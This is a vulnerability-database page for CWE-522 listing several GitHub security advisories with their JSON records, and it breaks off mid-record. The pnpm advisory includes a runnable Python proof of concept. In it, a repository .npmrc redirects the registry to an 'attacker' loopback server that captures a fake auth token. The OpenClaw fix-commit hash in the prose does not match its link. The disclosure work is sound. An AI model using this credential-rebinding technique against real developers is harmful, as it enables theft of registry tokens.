CWE-522
Allowed-with-ReviewInsufficiently Protected Credentials
Abstraction: Class · Status: Incomplete
The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.
1811 vulnerabilities reference this CWE, most recent first.
GHSA-CH6F-RRJ9-8J2M
Vulnerability from github – Published: 2026-05-21 12:31 – Updated: 2026-06-01 15:30The affected product may expose credentials remotely between low privileged visualization users during concurrent login operations due to insufficient isolation of authentication data. The vulnerability affects only login operations within an active visualization session.
{
"affected": [],
"aliases": [
"CVE-2026-0393"
],
"database_specific": {
"cwe_ids": [
"CWE-522"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-21T12:16:19Z",
"severity": "MODERATE"
},
"details": "The affected product may expose credentials remotely between low privileged visualization users during concurrent login operations due to insufficient isolation of authentication data. The vulnerability affects only login operations within an active visualization session.",
"id": "GHSA-ch6f-rrj9-8j2m",
"modified": "2026-06-01T15:30:34Z",
"published": "2026-05-21T12:31:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0393"
},
{
"type": "WEB",
"url": "https://codesys.csaf-tp.certvde.com/.well-known/csaf/white/2026/advisory2026-07_vde-2026-052.json"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-CH8F-F5G7-VHHR
Vulnerability from github – Published: 2022-04-30 18:09 – Updated: 2024-08-01 21:31Stolen credentials from SSH clients via ssh-agent program, allowing other local users to access remote accounts belonging to the ssh-agent user.
{
"affected": [],
"aliases": [
"CVE-1999-0013"
],
"database_specific": {
"cwe_ids": [
"CWE-522"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "1998-01-22T05:00:00Z",
"severity": "HIGH"
},
"details": "Stolen credentials from SSH clients via ssh-agent program, allowing other local users to access remote accounts belonging to the ssh-agent user.",
"id": "GHSA-ch8f-f5g7-vhhr",
"modified": "2024-08-01T21:31:38Z",
"published": "2022-04-30T18:09:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-1999-0013"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-1999-0013"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CHF7-JQ6G-QRWV
Vulnerability from github – Published: 2026-02-18 22:43 – Updated: 2026-02-20 16:47Vulnerability
Telegram bot tokens can appear in error messages and stack traces (for example, when request URLs include https://api.telegram.org/bot<token>/...). OpenClaw previously logged these strings without redaction, which could leak the bot token into logs, crash reports, CI output, or support bundles.
Impact
Disclosure of a Telegram bot token allows an attacker to impersonate the bot and take over Bot API access.
Affected Packages / Versions
- Package:
openclaw(npm) - Affected:
<= 2026.2.14 - Fixed:
>= 2026.2.15(next release)
Mitigation
- Upgrade to
openclaw >= 2026.2.15when released. - Rotate the Telegram bot token if it may have been exposed.
Fix Commit(s)
- cf6990701b258bb9cc4ac7f6c7bdf05016e7f6e46
Thanks @aether-ai-agent for reporting.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2026.2.15"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27003"
],
"database_specific": {
"cwe_ids": [
"CWE-522"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-18T22:43:21Z",
"nvd_published_at": "2026-02-20T00:16:16Z",
"severity": "MODERATE"
},
"details": "## Vulnerability\n\nTelegram bot tokens can appear in error messages and stack traces (for example, when request URLs include `https://api.telegram.org/bot\u003ctoken\u003e/...`). OpenClaw previously logged these strings without redaction, which could leak the bot token into logs, crash reports, CI output, or support bundles.\n\n## Impact\n\nDisclosure of a Telegram bot token allows an attacker to impersonate the bot and take over Bot API access.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `\u003c= 2026.2.14`\n- Fixed: `\u003e= 2026.2.15` (next release)\n\n## Mitigation\n\n- Upgrade to `openclaw \u003e= 2026.2.15` when released.\n- Rotate the Telegram bot token if it may have been exposed.\n\n## Fix Commit(s)\n\n- cf6990701b258bb9cc4ac7f6c7bdf05016e7f6e46\n\nThanks @aether-ai-agent for reporting.",
"id": "GHSA-chf7-jq6g-qrwv",
"modified": "2026-02-20T16:47:10Z",
"published": "2026-02-18T22:43:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-chf7-jq6g-qrwv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27003"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/cf69907015b659e5025efb735ee31bd05c4ee3d5"
},
{
"type": "PACKAGE",
"url": "https://github.com/openclaw/openclaw"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenClaw: Telegram bot token exposure via logs"
}
GHSA-CHM8-WP3H-F4M3
Vulnerability from github – Published: 2022-05-24 16:43 – Updated: 2023-10-26 15:33Jenkins jira-ext Plugin 0.8 and earlier stored credentials unencrypted in its global configuration file hudson.plugins.jira.JiraProjectProperty.xml on the Jenkins master. These credentials could be viewed by users with access to the Jenkins master file system.
jira-ext Plugin version 0.9 stores credentials encrypted.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.plugins:jira-ext"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-10302"
],
"database_specific": {
"cwe_ids": [
"CWE-256",
"CWE-522"
],
"github_reviewed": true,
"github_reviewed_at": "2023-05-19T23:46:18Z",
"nvd_published_at": "2019-04-18T17:29:00Z",
"severity": "HIGH"
},
"details": "Jenkins jira-ext Plugin 0.8 and earlier stored credentials unencrypted in its global configuration file `hudson.plugins.jira.JiraProjectProperty.xml` on the Jenkins master. These credentials could be viewed by users with access to the Jenkins master file system.\n\njira-ext Plugin version 0.9 stores credentials encrypted.",
"id": "GHSA-chm8-wp3h-f4m3",
"modified": "2023-10-26T15:33:47Z",
"published": "2022-05-24T16:43:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10302"
},
{
"type": "WEB",
"url": "https://github.com/jenkinsci/jira-ext-plugin/commit/e252f4084089e5cfb4c7bad389d3d20f3ec594fb"
},
{
"type": "WEB",
"url": "https://jenkins.io/security/advisory/2019-04-17/#SECURITY-836"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/108045"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Jenkins jira-ext Plugin stores credentials unencrypted"
}
GHSA-CHPH-R4JM-2932
Vulnerability from github – Published: 2025-12-31 21:30 – Updated: 2025-12-31 21:30ZBL EPON ONU Broadband Router V100R001 contains a privilege escalation vulnerability that allows limited administrative users to elevate access by sending requests to configuration endpoints. Attackers can exploit the vulnerability by accessing the configuration backup or password page to disclose the super user password and gain additional privileged functionalities.
{
"affected": [],
"aliases": [
"CVE-2021-47741"
],
"database_specific": {
"cwe_ids": [
"CWE-522"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-31T19:15:42Z",
"severity": "HIGH"
},
"details": "ZBL EPON ONU Broadband Router V100R001 contains a privilege escalation vulnerability that allows limited administrative users to elevate access by sending requests to configuration endpoints. Attackers can exploit the vulnerability by accessing the configuration backup or password page to disclose the super user password and gain additional privileged functionalities.",
"id": "GHSA-chph-r4jm-2932",
"modified": "2025-12-31T21:30:57Z",
"published": "2025-12-31T21:30:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-47741"
},
{
"type": "WEB",
"url": "https://web.archive.org/web/20211220094023/http://www.wd-thailand.com"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/49737"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/zbl-epon-onu-broadband-router-vr-privilege-escalation-via-configuration-endpoint"
},
{
"type": "WEB",
"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php"
},
{
"type": "WEB",
"url": "http://www.zblchina.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-CHQ2-XRC4-6MWV
Vulnerability from github – Published: 2022-05-24 16:45 – Updated: 2023-03-20 18:30An elevation of privilege vulnerability exists when the Windows Kernel improperly handles key enumeration, aka 'Windows Kernel Elevation of Privilege Vulnerability'.
{
"affected": [],
"aliases": [
"CVE-2019-0881"
],
"database_specific": {
"cwe_ids": [
"CWE-522"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-05-16T19:29:00Z",
"severity": "HIGH"
},
"details": "An elevation of privilege vulnerability exists when the Windows Kernel improperly handles key enumeration, aka \u0027Windows Kernel Elevation of Privilege Vulnerability\u0027.",
"id": "GHSA-chq2-xrc4-6mwv",
"modified": "2023-03-20T18:30:52Z",
"published": "2022-05-24T16:45:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0881"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0881"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/152988/Microsoft-Windows-CmKeyBodyRemapToVirtualForEnum-Arbitrary-Key-Enumeration.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CJ6G-97J4-JW5F
Vulnerability from github – Published: 2021-12-09 00:00 – Updated: 2022-07-13 00:01There is a Credentials Management Errors vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to confidentiality affected.
{
"affected": [],
"aliases": [
"CVE-2021-37075"
],
"database_specific": {
"cwe_ids": [
"CWE-522"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-08T15:15:00Z",
"severity": "HIGH"
},
"details": "There is a Credentials Management Errors vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to confidentiality affected.",
"id": "GHSA-cj6g-97j4-jw5f",
"modified": "2022-07-13T00:01:33Z",
"published": "2021-12-09T00:00:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37075"
},
{
"type": "WEB",
"url": "https://consumer.huawei.com/en/support/bulletin/2021/10"
},
{
"type": "WEB",
"url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202109-0000001196270727"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-CJ9F-GCWH-7Q49
Vulnerability from github – Published: 2023-06-16 21:30 – Updated: 2025-03-30 03:30An issue was discovered in the C AMQP client library (aka rabbitmq-c) through 0.13.0 for RabbitMQ. Credentials can only be entered on the command line (e.g., for amqp-publish or amqp-consume) and are thus visible to local attackers by listing a process and its arguments.
{
"affected": [],
"aliases": [
"CVE-2023-35789"
],
"database_specific": {
"cwe_ids": [
"CWE-522"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-06-16T21:15:09Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in the C AMQP client library (aka rabbitmq-c) through 0.13.0 for RabbitMQ. Credentials can only be entered on the command line (e.g., for amqp-publish or amqp-consume) and are thus visible to local attackers by listing a process and its arguments.",
"id": "GHSA-cj9f-gcwh-7q49",
"modified": "2025-03-30T03:30:33Z",
"published": "2023-06-16T21:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35789"
},
{
"type": "WEB",
"url": "https://github.com/alanxz/rabbitmq-c/issues/575"
},
{
"type": "WEB",
"url": "https://github.com/alanxz/rabbitmq-c/pull/781"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00022.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-CJHM-452J-46H2
Vulnerability from github – Published: 2025-03-10 18:31 – Updated: 2025-03-10 18:31IBM Sterling File Gateway 6.0.0.0 through 6.1.2.6 and 6.2.0.0 through 6.2.0.3 UI could disclosure the installation path of the server which could aid in further attacks against the system.
{
"affected": [],
"aliases": [
"CVE-2024-47109"
],
"database_specific": {
"cwe_ids": [
"CWE-522"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-10T16:15:12Z",
"severity": "MODERATE"
},
"details": "IBM Sterling File Gateway 6.0.0.0 through 6.1.2.6 and 6.2.0.0 through 6.2.0.3 UI could disclosure the installation path of the server which could aid in further attacks against the system.",
"id": "GHSA-cjhm-452j-46h2",
"modified": "2025-03-10T18:31:56Z",
"published": "2025-03-10T18:31:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47109"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7185259"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-CJHR-43R9-CFMW
Vulnerability from github – Published: 2026-06-26 22:59 – Updated: 2026-06-26 22:59Summary
pnpm can send user-level unscoped npm authentication credentials to a registry chosen by a repository-local .npmrc file.
In the reproduced case, the user's npm config contains a default registry and an unscoped _authToken. The repository does not provide a token-bearing auth line. It only sets registry= to a different registry URL. During normal pnpm metadata/install workflows, pnpm binds the user-origin unscoped credential to the repository-selected registry and sends it as an Authorization header.
This was reproduced with fake credentials and loopback registries only. No third-party registry or real token was used.
Affected Behavior Observed
Observed affected:
- pnpm
10.33.2:pnpm install --ignore-scriptssends the user-level unscoped_authTokento the repository-selected registry. - pnpm
11.1.3:pnpm install --ignore-scriptssends the user-level unscoped_authTokento the repository-selected registry. - pnpm
11.2.1(next-11dist tag at testing time):pnpm install --ignore-scriptssends the user-level unscoped_authTokento the repository-selected registry. - pnpm
11.1.3:pnpm viewalso sends user-level unscoped_authToken,_auth, andusername/_passwordcredentials to the repository-selected registry in the local loopback replay.
Control:
- npm
10.9.7rejects the same unscoped user_authTokenconfiguration withERR_INVALID_AUTHand does not send anAuthorizationheader to the repository-selected registry. - URL-scoped registry token controls held in the local loopback replay: tokens scoped to the trusted registry URL were not sent to the attacker registry.
Threat Model
Victim:
- developer or CI job with user-level npm registry credentials configured;
- runs
pnpm install,pnpm view, or an equivalent pnpm metadata/restore command in a repository.
Attacker:
- controls repository-local package manager configuration, such as
.npmrc; - can set
registry=to a registry endpoint they control; - does not need to provide a token-bearing auth line for the strong case.
Boundary:
Credentials from a higher-trust user configuration should not be rebound to a lower-trust repository-selected registry unless the credential is explicitly scoped to that registry.
Minimal Reproduction
The reproducer below starts two loopback HTTP registries:
- a trusted registry URL used in the isolated user
.npmrc; - an attacker registry URL used in the repository-local
.npmrc.
The isolated user .npmrc contains:
registry=<trusted-loopback-registry>
_authToken=PR166_FAKE_REGISTRY_TOKEN
The repository-local .npmrc contains:
registry=<attacker-loopback-registry>
The repository package.json depends on a toy package served by the loopback registry. The script then runs:
pnpm install --ignore-scripts
npm install --ignore-scripts
Expected Safe Behavior
pnpm should not send the user-level unscoped _authToken to the repository-selected registry. A safe behavior would be to reject or ignore the unscoped credential in this lower-trust registry-rebinding situation and require the credential to be URL-scoped to the selected registry.
Observed Behavior
pnpm 10.33.2, pnpm 11.1.3, and pnpm 11.2.1 send:
Authorization: Bearer PR166_FAKE_REGISTRY_TOKEN
to the attacker loopback registry during install. npm 10.9.7 rejects the same config and sends no Authorization header.
Security Impact
This can disclose npm registry credentials from user-level configuration to a registry endpoint selected by an untrusted repository. The leak occurs before package lifecycle scripts run and does not depend on package code execution.
Non-Claims
This report does not claim:
- remote code execution;
- registry account compromise by itself;
- leakage of URL-scoped tokens for a different registry;
- npm CLI impact;
- impact from a repository explicitly committing its own token-bearing auth line.
Source-Level Notes
In pnpm's config/auth-header flow, unscoped/default credentials are parsed from the merged auth config and stored as default credentials. The auth-header logic then maps those default credentials to the effective default registry. Because repository-local .npmrc can change the effective default registry, higher-trust default credentials can be applied to a lower-trust registry choice.
Suggested Fix Direction
The conservative fix direction is to reject or contain unscoped/default auth credentials when a lower-trust workspace/repository config changes the default registry. A compatibility-preserving fix could track the source layer of both the default registry and the default credentials, then only bind default credentials to a registry selected by the same or higher-trust source. A stricter npm-compatible fix would reject unscoped auth and require URL-scoped credentials.
This needs maintainer semantic review and compatibility control because some legacy workflows may intentionally rely on default/unscoped auth.
Runnable Reproducer
Save the following as repro.py and run it with Python 3 in an environment with pnpm and npm available. To force a specific pnpm version through Corepack, set PR166_PNPM_SPEC, for example PR166_PNPM_SPEC=11.2.1.
import base64
import contextlib
import hashlib
import http.server
import io
import json
import os
import shutil
import subprocess
import sys
import tarfile
import tempfile
import threading
from pathlib import Path
"""Standalone loopback reproducer.
It creates only temporary directories and loopback HTTP servers. Cleanup is handled by TemporaryDirectory context managers and registry shutdown handlers; no persistent state is expected outside the package-manager cache directories inside the temporary home. Non-claims: this does not use real credentials, third-party registries, package scripts, or remote services. Failure paths return exit 1 or exit 2 through sys.exit(main()).
"""
TOKEN = "PR166_FAKE_REGISTRY_TOKEN"
PACKAGE_TGZ = None
class RegistryHandler(http.server.BaseHTTPRequestHandler):
requests = []
def do_GET(self):
self.requests.append(
{
"method": self.command,
"path": self.path,
"authorization": self.headers.get("Authorization"),
}
)
if self.path.endswith(".tgz"):
payload = make_package_tgz()
self.send_response(200)
self.send_header("Content-Type", "application/octet-stream")
self.send_header("Content-Length", str(len(payload)))
self.end_headers()
self.wfile.write(payload)
return
payload = make_package_tgz()
body = json.dumps(
{
"name": "@private/probe",
"dist-tags": {"latest": "1.0.0"},
"versions": {
"1.0.0": {
"name": "@private/probe",
"version": "1.0.0",
"dist": {
"tarball": f"http://127.0.0.1:{self.server.server_port}/private/@private/probe/-/probe-1.0.0.tgz",
"shasum": hashlib.sha1(payload).hexdigest(),
"integrity": "sha512-"
+ base64.b64encode(hashlib.sha512(payload).digest()).decode("ascii"),
},
}
},
}
).encode("utf-8")
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.send_header("Content-Length", str(len(body)))
self.end_headers()
self.wfile.write(body)
def log_message(self, fmt, *args):
return
@contextlib.contextmanager
def registry():
handler = type("RecordingRegistryHandler", (RegistryHandler,), {"requests": []})
server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler)
thread = threading.Thread(target=server.serve_forever, daemon=True)
thread.start()
try:
yield server, handler.requests
finally:
server.shutdown()
thread.join(timeout=5)
server.server_close()
def make_package_tgz():
global PACKAGE_TGZ
if PACKAGE_TGZ is not None:
return PACKAGE_TGZ
bio = io.BytesIO()
with tarfile.open(fileobj=bio, mode="w:gz") as tf:
data = b'{"name":"@private/probe","version":"1.0.0"}\n'
info = tarfile.TarInfo("package/package.json")
info.size = len(data)
tf.addfile(info, io.BytesIO(data))
PACKAGE_TGZ = bio.getvalue()
return PACKAGE_TGZ
def write_text(path, text):
path.parent.mkdir(parents=True, exist_ok=True)
path.write_text(text, encoding="utf-8", newline="\n")
def run_install(tool, trusted_url, attacker_url):
exe = shutil.which(tool)
if exe is None:
return {"tool": tool, "error": "missing"}
cmd = [exe, "install", "--ignore-scripts"]
if tool == "pnpm" and os.environ.get("PR166_PNPM_SPEC"):
corepack = shutil.which("corepack")
if corepack is None:
return {"tool": tool, "error": "corepack missing"}
cmd = [corepack, f"pnpm@{os.environ['PR166_PNPM_SPEC']}", "install", "--ignore-scripts"]
with tempfile.TemporaryDirectory(prefix=f"pr166-min-{tool}-") as td:
root = Path(td)
home = root / "home"
project = root / "project"
home.mkdir()
project.mkdir()
userconfig = home / ".npmrc"
write_text(userconfig, f"registry={trusted_url}\n_authToken={TOKEN}\n")
write_text(project / ".npmrc", f"registry={attacker_url}\n")
write_text(
project / "package.json",
'{"name":"pr166-probe","version":"1.0.0","dependencies":{"@private/probe":"1.0.0"}}\n',
)
env = os.environ.copy()
env.update(
{
"HOME": str(home),
"USERPROFILE": str(home),
"NPM_CONFIG_USERCONFIG": str(userconfig),
"npm_config_userconfig": str(userconfig),
"NPM_CONFIG_CACHE": str(home / "cache"),
"npm_config_cache": str(home / "cache"),
"NPM_CONFIG_STORE_DIR": str(home / "store"),
"npm_config_store_dir": str(home / "store"),
"XDG_CACHE_HOME": str(home / "xdg-cache"),
"XDG_DATA_HOME": str(home / "xdg-data"),
"NO_COLOR": "1",
}
)
proc = subprocess.run(
cmd,
cwd=str(project),
env=env,
text=True,
encoding="utf-8",
errors="replace",
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
timeout=60,
)
return {"tool": tool, "returncode": proc.returncode, "output_tail": proc.stdout[-2000:]}
def summarize(tool, result, attacker_requests):
auth_hits = [r for r in attacker_requests if r.get("authorization")]
return {
"tool": tool,
"result": result,
"attacker_auth_hits": auth_hits,
"attacker_request_count": len(attacker_requests),
}
def tool_version(tool):
exe = shutil.which(tool)
if exe is None:
return "missing"
cmd = [exe, "--version"]
if tool == "pnpm" and os.environ.get("PR166_PNPM_SPEC"):
corepack = shutil.which("corepack")
if corepack is None:
return "corepack missing"
cmd = [corepack, f"pnpm@{os.environ['PR166_PNPM_SPEC']}", "--version"]
proc = subprocess.run(
cmd,
text=True,
encoding="utf-8",
errors="replace",
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
timeout=20,
)
return proc.stdout.strip() or f"exit-{proc.returncode}"
def main():
pnpm_version = tool_version("pnpm")
npm_version = tool_version("npm")
print(f"TARGET_VERSION=pnpm {pnpm_version}; npm {npm_version}")
if pnpm_version == "missing" or npm_version == "missing":
print("CHECK environment_has_pnpm_and_npm result=fail")
return 1
print("ENVIRONMENT_READY")
overall = []
with registry() as (trusted, _trusted_requests), registry() as (attacker, attacker_requests):
trusted_url = f"http://127.0.0.1:{trusted.server_port}/private/"
attacker_url = f"http://127.0.0.1:{attacker.server_port}/private/"
before = len(attacker_requests)
pnpm_result = run_install("pnpm", trusted_url, attacker_url)
pnpm_summary = summarize("pnpm", pnpm_result, attacker_requests[before:])
overall.append(pnpm_summary)
before = len(attacker_requests)
npm_result = run_install("npm", trusted_url, attacker_url)
npm_summary = summarize("npm", npm_result, attacker_requests[before:])
overall.append(npm_summary)
print(json.dumps(overall, indent=2))
pnpm_leaked = bool(overall[0]["attacker_auth_hits"])
npm_leaked = bool(overall[1]["attacker_auth_hits"])
print(f"OBSERVED_PNPM_AUTH_HITS={len(overall[0]['attacker_auth_hits'])}")
print(f"OBSERVED_NPM_AUTH_HITS={len(overall[1]['attacker_auth_hits'])}")
print(
"COMMAND_EXIT_CODE="
f"pnpm:{overall[0]['result'].get('returncode', 'missing')} "
f"npm:{overall[1]['result'].get('returncode', 'missing')}"
)
if pnpm_leaked and not npm_leaked:
print("CHECK pnpm_leaked=true npm_control_held=true result=pass")
print("VULNERABLE_BEHAVIOR_CONFIRMED")
print("RESULT_PNPM_REBINDS_UNSCOPED_USER_TOKEN_NPM_CONTROL_HELD")
print("RESULT_SECURITY_BOUNDARY_BYPASS_CONFIRMED")
return 0
if pnpm_leaked and npm_leaked:
print("CHECK pnpm_leaked=true npm_control_held=false result=fail")
print("RESULT_BOTH_TOOLS_SENT_AUTH")
return 2
print("CHECK pnpm_leaked=false result=fail")
print("RESULT_NO_PNPM_AUTH_LEAK")
return 1
if __name__ == "__main__":
sys.exit(main())
Abbreviated Expected Output
TARGET_VERSION=pnpm 11.2.1; npm 10.9.7
ENVIRONMENT_READY
...
OBSERVED_PNPM_AUTH_HITS=3
OBSERVED_NPM_AUTH_HITS=0
COMMAND_EXIT_CODE=pnpm:0 npm:1
CHECK pnpm_leaked=true npm_control_held=true result=pass
VULNERABLE_BEHAVIOR_CONFIRMED
RESULT_PNPM_REBINDS_UNSCOPED_USER_TOKEN_NPM_CONTROL_HELD
RESULT_SECURITY_BOUNDARY_BYPASS_CONFIRMED
Reporter: JUNYI LIU
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "pnpm"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.34.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "pnpm"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"fixed": "11.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-50017"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-522"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-26T22:59:25Z",
"nvd_published_at": "2026-06-25T18:16:39Z",
"severity": "MODERATE"
},
"details": "## Summary\n\npnpm can send user-level unscoped npm authentication credentials to a registry chosen by a repository-local `.npmrc` file.\n\nIn the reproduced case, the user\u0027s npm config contains a default registry and an unscoped `_authToken`. The repository does not provide a token-bearing auth line. It only sets `registry=` to a different registry URL. During normal pnpm metadata/install workflows, pnpm binds the user-origin unscoped credential to the repository-selected registry and sends it as an `Authorization` header.\n\nThis was reproduced with fake credentials and loopback registries only. No third-party registry or real token was used.\n\n## Affected Behavior Observed\n\nObserved affected:\n\n- pnpm `10.33.2`: `pnpm install --ignore-scripts` sends the user-level unscoped `_authToken` to the repository-selected registry.\n- pnpm `11.1.3`: `pnpm install --ignore-scripts` sends the user-level unscoped `_authToken` to the repository-selected registry.\n- pnpm `11.2.1` (`next-11` dist tag at testing time): `pnpm install --ignore-scripts` sends the user-level unscoped `_authToken` to the repository-selected registry.\n- pnpm `11.1.3`: `pnpm view` also sends user-level unscoped `_authToken`, `_auth`, and `username` / `_password` credentials to the repository-selected registry in the local loopback replay.\n\nControl:\n\n- npm `10.9.7` rejects the same unscoped user `_authToken` configuration with `ERR_INVALID_AUTH` and does not send an `Authorization` header to the repository-selected registry.\n- URL-scoped registry token controls held in the local loopback replay: tokens scoped to the trusted registry URL were not sent to the attacker registry.\n\n## Threat Model\n\nVictim:\n\n- developer or CI job with user-level npm registry credentials configured;\n- runs `pnpm install`, `pnpm view`, or an equivalent pnpm metadata/restore command in a repository.\n\nAttacker:\n\n- controls repository-local package manager configuration, such as `.npmrc`;\n- can set `registry=` to a registry endpoint they control;\n- does not need to provide a token-bearing auth line for the strong case.\n\nBoundary:\n\nCredentials from a higher-trust user configuration should not be rebound to a lower-trust repository-selected registry unless the credential is explicitly scoped to that registry.\n\n## Minimal Reproduction\n\nThe reproducer below starts two loopback HTTP registries:\n\n- a trusted registry URL used in the isolated user `.npmrc`;\n- an attacker registry URL used in the repository-local `.npmrc`.\n\nThe isolated user `.npmrc` contains:\n\n```ini\nregistry=\u003ctrusted-loopback-registry\u003e\n_authToken=PR166_FAKE_REGISTRY_TOKEN\n```\n\nThe repository-local `.npmrc` contains:\n\n```ini\nregistry=\u003cattacker-loopback-registry\u003e\n```\n\nThe repository `package.json` depends on a toy package served by the loopback registry. The script then runs:\n\n```text\npnpm install --ignore-scripts\nnpm install --ignore-scripts\n```\n\n## Expected Safe Behavior\n\npnpm should not send the user-level unscoped `_authToken` to the repository-selected registry. A safe behavior would be to reject or ignore the unscoped credential in this lower-trust registry-rebinding situation and require the credential to be URL-scoped to the selected registry.\n\n## Observed Behavior\n\npnpm `10.33.2`, pnpm `11.1.3`, and pnpm `11.2.1` send:\n\n```http\nAuthorization: Bearer PR166_FAKE_REGISTRY_TOKEN\n```\n\nto the attacker loopback registry during install. npm `10.9.7` rejects the same config and sends no `Authorization` header.\n\n## Security Impact\n\nThis can disclose npm registry credentials from user-level configuration to a registry endpoint selected by an untrusted repository. The leak occurs before package lifecycle scripts run and does not depend on package code execution.\n\n## Non-Claims\n\nThis report does not claim:\n\n- remote code execution;\n- registry account compromise by itself;\n- leakage of URL-scoped tokens for a different registry;\n- npm CLI impact;\n- impact from a repository explicitly committing its own token-bearing auth\n line.\n\n## Source-Level Notes\n\nIn 